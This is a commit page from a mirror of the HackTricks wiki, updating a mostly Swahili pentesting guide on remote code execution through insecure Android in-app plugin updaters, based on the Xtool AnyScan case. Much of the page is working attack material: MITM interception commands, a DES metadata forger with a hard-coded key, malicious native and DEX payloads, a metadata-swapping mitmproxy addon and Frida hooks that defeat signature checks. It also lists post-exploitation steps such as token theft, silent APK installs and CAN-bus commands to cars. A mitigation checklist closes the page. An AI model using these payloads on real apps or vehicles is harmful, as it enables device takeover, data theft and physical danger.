maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/mobile-pentesting/android-app-pentesting/insecure-in-ap

Browse Source
This commit is contained in:
Translator 2025-08-27 04:09:28 +00:00
parent b811c3dc78
commit 4b5d2a7fb8
1 changed files with 150 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

190
src/mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md
View File

@ -1,16 +1,49 @@
# Insecure In-App Update Mechanisms Remote Code Execution via Malicious Plugins
# Mbinu zisizo salama za In-App Update Remote Code Execution via Malicious Plugins
{{#include ../../banners/hacktricks-training.md}}
Mifumo mingi ya programu za Android inatekeleza **“plugin” zao au “dynamic feature” channels za sasisho** badala ya kutumia Google Play Store. Wakati utekelezaji hauko salama, mshambuliaji anayeweza kukamata trafiki anaweza kutoa **msimbo wa asili usio na mipaka ambao utawekwa ndani ya mchakato wa programu**, na kusababisha Utekelezaji wa Msimbo wa K remote (RCE) kwenye simu na katika baadhi ya matukio kwenye kifaa chochote cha nje kinachodhibitiwa na programu (magari, IoT, vifaa vya matibabu …).
Programu nyingi za Android hufanya vyanzo vyao vya “plugin” au “dynamic feature” vya updates badala ya kutumia Google Play Store. Iwapo utekelezaji si salama, mshambuliaji anayeweza kuingilia au kubadilisha trafiki ya update anaweza kusambaza arbitrary native au Dalvik/ART code zitakazopakiwa ndani ya mchakato wa app, na kusababisha Remote Code Execution (RCE) kamili kwenye handset — na katika baadhi ya matukio kwenye kifaa chochote cha nje kinachodhibitiwa na app (cars, IoT, medical devices …).
Ukurasa huu unatoa muhtasari wa mnyororo wa udhaifu wa kweli uliopatikana katika programu ya uchambuzi wa magari ya Xtool **AnyScan** (v4.40.11 → 4.40.40) na kuufanya kuwa wa jumla ili uweze kukagua programu nyingine za Android na kutumia makosa ya usanidi wakati wa ushirikiano wa timu nyekundu.
Ukurasa huu unatoa muhtasari wa mnyororo wa udhaifu uliopatikana katika Xtool AnyScan automotive-diagnostics app (v4.40.11 → 4.40.40) na kunoa mbinu ili uweze kuauditi Android apps nyingine na weaponise mis-configuration wakati wa red-team engagement.
---
## 1. Kutambua TrustManager Isiyo Salama ya TLS
## 0. Ukaguzi wa haraka: je, app ina inapp updater?
1. Fanya decompile ya APK kwa kutumia jadx / apktool na pata safu ya mtandao (OkHttp, HttpUrlConnection, Retrofit…).
2. Tafuta **`TrustManager` ya kawaida** au `HostnameVerifier` inayotegemea kila cheti bila masharti:
Dalili za static za kutafuta katika JADX/apktool:
- Strings: "update", "plugin", "patch", "upgrade", "hotfix", "bundle", "feature", "asset", "zip".
- Endpoints za mtandao kama `/update`, `/plugins`, `/getUpdateList`, `/GetUpdateListEx`.
- Msaada wa crypto karibu na njia za update (DES/AES/RC4; Base64; JSON/XML packs).
- Dynamic loaders: `System.load`, `System.loadLibrary`, `dlopen`, `DexClassLoader`, `PathClassLoader`.
- Njia za unzip zinazoandika chini ya app-internal au external storage, kisha mara moja ku-load `.so`/DEX.
Runtime hooks za kuthibitisha:
```js
// Frida: log native and dex loading
Java.perform(() => {
const Runtime = Java.use('java.lang.Runtime');
const SystemJ = Java.use('java.lang.System');
const DexClassLoader = Java.use('dalvik.system.DexClassLoader');
SystemJ.load.overload('java.lang.String').implementation = function(p) {
console.log('[System.load] ' + p); return this.load(p);
};
SystemJ.loadLibrary.overload('java.lang.String').implementation = function(n) {
console.log('[System.loadLibrary] ' + n); return this.loadLibrary(n);
};
Runtime.load.overload('java.lang.String').implementation = function(p){
console.log('[Runtime.load] ' + p); return this.load(p);
};
DexClassLoader.$init.implementation = function(dexPath, optDir, libPath, parent) {
console.log(`[DexClassLoader] dex=${dexPath} odex=${optDir} jni=${libPath}`);
return this.$init(dexPath, optDir, libPath, parent);
};
});
```
---
## 1. Kutambua TrustManager isiyo salama ya TLS
1. Dekompaile APK kwa kutumia jadx / apktool na tafuta stack ya mitandao (OkHttp, HttpUrlConnection, Retrofit…).
2. Tafuta `TrustManager` au `HostnameVerifier` maalum ambao inaamini bila kuchunguza vyeti vyote:
```java
public static TrustManager[] buildTrustManagers() {
return new TrustManager[]{
@ -22,25 +55,36 @@ public X509Certificate[] getAcceptedIssuers() {return new X509Certificate[]{};}
};
}
```
3. Ikiwa ipo, programu itakubali **cheti chochote cha TLS** → unaweza kuendesha **MITM proxy** wazi na cheti kilichojisajili mwenyewe:
3. Ikiwa ipo, programu itakubali cheti chochote cha TLS → unaweza kuendesha transparent MITM proxy kwa self-signed cert:
```bash
mitmproxy -p 8080 -s addon.py # see §4
iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080 # on rooted device / emulator
```
## 2. Kurejesha Uhandisi wa Metadata ya Sasisho
Ikiwa TLS pinning imetekelezwa badala ya mantiki isiyo salama ya trust-all, angalia:
Katika kesi ya AnyScan, kila uzinduzi wa programu unachochea HTTPS GET kwa:
{{#ref}}
android-anti-instrumentation-and-ssl-pinning-bypass.md
{{#endref}}
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
---
## 2. Reverse-Engineering ya metadata ya masasisho
Katika kesi ya AnyScan, kila uzinduzi wa app husababisha HTTPS GET kwa:
```
https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx
```
Mwili wa jibu ni **document ya XML** ambayo nodi za `<FileData>` zina **JSON iliyosimbwa kwa Base64, DES-ECB** inayoelezea kila plugin inayopatikana.
Mwili wa jibu ni hati ya XML ambapo node za `<FileData>` zina JSON iliyosimbwa kwa DES-ECB na iliyo Base64-encoded inayofafanua kila plugin inayopatikana.
Hatua za kawaida za uwindaji:
1. Pata utaratibu wa crypto (mfano `RemoteServiceProxy`) na urejeshe:
* algorithimu (DES / AES / RC4 …)
* njia ya uendeshaji (ECB / CBC / GCM …)
* funguo zilizowekwa kwa nguvu / IV (mara nyingi funguo za DES za bit 56 au funguo za AES za bit 128 katika constants)
2. Re-implementa kazi hiyo katika Python ili kufungua / kusimbia metadata:
Typical hunting steps:
1. Pata rotina ya crypto (e.g. `RemoteServiceProxy`) na upate:
- algoritimu (DES / AES / RC4 …)
- mode ya uendeshaji (ECB / CBC / GCM …)
- funguo zilizo hard-coded / IV (kawaida 56bit DES au 128bit AES konstanti)
2. Rudia kutekeleza function hiyo kwa Python ili ku-decrypt / ku-encrypt metadata:
```python
from Crypto.Cipher import DES
from base64 import b64decode, b64encode
@ -55,9 +99,17 @@ def encrypt_metadata(plaintext: bytes) -> str:
cipher = DES.new(KEY, DES.MODE_ECB)
return b64encode(cipher.encrypt(plaintext.ljust((len(plaintext)+7)//8*8, b"\x00"))).decode()
```
Maelezo yaliyoonekana porini (20232025):
- Metadata mara nyingi huwa JSON-within-XML au protobuf; sifre dhaifu na funguo za static ni za kawaida.
- Updaters nyingi zinakubali plain HTTP kwa ajili ya kupakua payload halisi hata kama metadata inakuja kupitia HTTPS.
- Plugins mara nyingi hu-unzip kwenye app-internal storage; baadhi bado hutumia external storage au legacy `requestLegacyExternalStorage`, kuruhusu cross-app tampering.
---
## 3. Tengeneza Plugin Mbaya
1. Chagua ZIP ya plugin halali yoyote na badilisha maktaba asilia na payload yako:
### 3.1 Njia ya native library (dlopen/System.load[Library])
1. Chagua ZIP yoyote ya plugin halali na badilisha native library na payload yako:
```c
// libscan_x64.so constructor runs as soon as the library is loaded
__attribute__((constructor))
@ -71,12 +123,37 @@ __android_log_print(ANDROID_LOG_INFO, "PWNED", "Exploit loaded! uid=%d", getuid(
$ aarch64-linux-android-gcc -shared -fPIC payload.c -o libscan_x64.so
$ zip -r PWNED.zip libscan_x64.so assets/ meta.txt
```
2. Sasisha metadata ya JSON ili `"FileName" : "PWNED.zip"` na `"DownloadURL"` ielekeze kwenye seva yako ya HTTP.
3. Fanya DES-encrypt + Base64-encode JSON iliyobadilishwa na uikopishe ndani ya XML iliyokamatwa.
2. Sasisha metadata ya JSON ili "FileName" : "PWNED.zip" na "DownloadURL" ziwe zinarejea kwenye HTTP server yako.
3. Fanya reencrypt + Base64encode kwa JSON iliyobadilishwa kisha ibandika tena ndani ya XML iliyokamatwa.
## 4. Toa Payload na mitmproxy
### 3.2 Njia ya plugin inayotegemea Dex (DexClassLoader)
`addon.py` mfano ambao *kimya* unabadilisha metadata ya asili:
Baadhi ya apps hupakua JAR/APK na hupakia code kupitia `DexClassLoader`. Tengeneza DEX hatari itakayotekelezwa wakati wa kupakia:
```java
// src/pwn/Dropper.java
package pwn;
public class Dropper {
static { // runs on class load
try {
Runtime.getRuntime().exec("sh -c 'id > /data/data/<pkg>/files/pwned' ");
} catch (Throwable t) {}
}
}
```
```bash
# Compile and package to a DEX jar
javac -source 1.8 -target 1.8 -d out/ src/pwn/Dropper.java
jar cf dropper.jar -C out/ .
d8 --output outdex/ dropper.jar
cd outdex && zip -r plugin.jar classes.dex # the updater will fetch this
```
Ikiwa lengo litaite `Class.forName("pwn.Dropper")` static initializer yako itaendesha; vinginevyo, kupitia reflection, orodhesha madarasa yaliyopakiwa kwa kutumia Frida kisha ita method iliyotolewa.
---
## 4. Wasilisha Payload na mitmproxy
`addon.py` mfano unaobadilisha metadata asilia bila kutambulika:
```python
from mitmproxy import http
MOD_XML = open("fake_metadata.xml", "rb").read()
@ -89,36 +166,69 @@ MOD_XML,
{"Content-Type": "text/xml"}
)
```
Kimbia seva rahisi ya wavuti ili kuhifadhi ZIP yenye uharibifu:
Endesha web server rahisi ili ku-host ZIP/JAR ya hasidi:
```bash
python3 -m http.server 8000 --directory ./payloads
```
When the victim launches the app it will:
* fetch our forged XML over the MITM channel;
* decrypt & parse it with the hard-coded DES key;
* download `PWNED.zip` → unzip inside private storage;
* `dlopen()` the included *libscan_x64.so*, instantly executing our code **with the apps permissions** (camera, GPS, Bluetooth, filesystem, …).
- itachukua XML yetu iliyodanganywa kupitia chaneli ya MITM;
- decrypt & parse it with the hard-coded crypto;
- download `PWNED.zip` or `plugin.jar` → unzip inside private storage;
- load the included `.so` or DEX, instantly executing our code with the apps permissions (camera, GPS, Bluetooth, filesystem, …).
Because the plugin is cached on disk the backdoor **persists across reboots** and runs every time the user selects the related feature.
## 5. Wazo Baada ya Utekelezaji
* Pora vidakuzi vya kikao, tokens za OAuth, au JWTs zilizohifadhiwa na programu.
* Acha APK ya hatua ya pili na kuisakinisha kimya kimya kupitia `pm install` (programu tayari ina `REQUEST_INSTALL_PACKAGES`).
* Tumia vifaa vyovyote vilivyounganishwa katika hali ya AnyScan unaweza kutuma amri za **OBD-II / CAN bus** (fungua milango, zima ABS, nk.).
Because the plugin is cached on disk the backdoor persists across reboots and runs every time the user selects the related feature.
---
### Orodha ya Ugunduzi & Kupunguza (timu ya buluu)
## 4.1 Bypassing signature/hash checks (when present)
* KAMWE usisambaze toleo la uzalishaji lenye TrustManager/HostnameVerifier maalum inayozuia uthibitishaji wa cheti.
* Usipakue msimbo wa kutekeleza kutoka nje ya Google Play. Ikiwa *lazima*, sahihi kila plugin kwa ufunguo sawa wa **apkSigning v2** na thibitisha saini kabla ya kupakia.
* Badilisha crypto dhaifu/iliyowekwa kwa **AES-GCM** na ufunguo unaobadilika upande wa seva.
* Thibitisha uadilifu wa maktaba zilizopakuliwa (saini au angalau SHA-256).
If the updater validates signatures or hashes, hook verification to always accept attacker content:
```js
// Frida make java.security.Signature.verify() return true
Java.perform(() => {
const Sig = Java.use('java.security.Signature');
Sig.verify.overload('[B').implementation = function(a) { return true; };
});
// Less surgical (use only if needed): defeat Arrays.equals() for byte[]
Java.perform(() => {
const Arrays = Java.use('java.util.Arrays');
Arrays.equals.overload('[B', '[B').implementation = function(a, b) { return true; };
});
```
Pia zingatia ku-stub mbinu za vendor kama `PluginVerifier.verifySignature()`, `checkHash()`, au kupunguza/ku-shortcircuit mantiki ya gating ya update katika Java au JNI.
---
## Marejeleo
## 5. Nyuso nyingine za mashambulizi katika vipengele vya masasisho (20232025)
- Zip Slip path traversal wakati wa kutoa plugins: vitu hatarishi kama `../../../../data/data/<pkg>/files/target` vinaweza kuandika juu ya faili yoyote. Daima sanitisha njia za entry na tumia allowlists.
- External storage staging: ikiwa app inaandika archive kwenye external storage kabla ya kuipakia, app nyingine yoyote inaweza kuiharibu. Scoped Storage au internal app storage vinaepuka hili.
- Cleartext downloads: metadata kwa HTTPS lakini payload kwa HTTP → kubadilishana kwa MITM kwa urahisi.
- Incomplete signature checks: kulinganisha hash ya faili moja tu, si archive yote; kutoziunganisha saini na developer key; kukubali yoyote RSA key iliyopo ndani ya archive.
- React Native / Web-based OTA content: ikiwa native bridges zinaendesha JS kutoka OTA bila signing kali, utekelezaji wa code yoyote katika muktadha wa app unaweza kutokea (mf., flows zinazofanana na CodePush zisizo salama). Hakikisha detached update signing na verification kali.
---
## 6. Post-Exploitation Ideas
- Pora session cookies, OAuth tokens, au JWTs zilizo hifadhiwa na app.
- Angusha APK ya hatua ya pili na uitumie kimya kwa `pm install` ikiwa inawezekana (app zingine tayari zinaeleza `REQUEST_INSTALL_PACKAGES`).
- Tumia vibaya vifaa vyovyote vilivyounganishwa katika tukio la AnyScan unaweza kutuma amri yoyote ya OBDII / CAN bus (fungua milango, zima ABS, n.k.).
---
### Orodha ya Ugundaji na Kupunguza Hatari (blue team)
- Epuka dynamic code loading na outofstore updates. Prefer Playmediated updates. Ikiwa dynamic plugins ni sharti, zitenge kama bundles za data tu na weka executable code katika base APK.
- Tekeleza TLS ipasavyo: usitumie custom trustall managers; weka pinning pale inapowezekana na network security config iliyokazwa inayokataa trafiki ya cleartext.
- Usipakue executable code kutoka nje ya Google Play. Ikiwa lazima, tumia detached update signing (mf., Ed25519/RSA) na developerheld key na hakikisha kabla ya kuipakia. Unganisha metadata na payload (urefu, hash, version) na fail closed.
- Tumia crypto ya kisasa (AESGCM) na nonces kwa ujumbe kwa metadata; tosha hardcoded keys kutoka kwa clients.
- Thibitisha uadilifu wa archives zilizopakuliwa: hakiki saini inayofunika kila faili, au angalau hakiki manifest ya SHA256 hashes. Kataa faili za ziada/zisizojulikana.
- Hifadhi downloads katika appinternal storage (au scoped storage kwenye Android 10+) na tumia ruhusa za faili zinazozuia kuingiliwa na apps nyingine.
- Linda dhidi ya Zip Slip: normaliza na thibitisha zip entry paths kabla ya extraction; kata absolute paths au sehemu `..`.
- Fikiria Play “Code Transparency” ili wewe na watumiaji muweze kuthibitisha kwamba shipped DEX/native code inalingana na mlivyojenga (inaongeza usalama lakini haibadilishi APK signing).
---
## References
- [NowSecure Remote Code Execution Discovered in Xtool AnyScan App](https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/)
- [Android Unsafe TrustManager patterns](https://developer.android.com/privacy-and-security/risks/unsafe-trustmanager)
- [Android Developers Dynamic Code Loading (risks and mitigations)](https://developer.android.com/privacy-and-security/risks/dynamic-code-loading)
{{#include ../../banners/hacktricks-training.md}}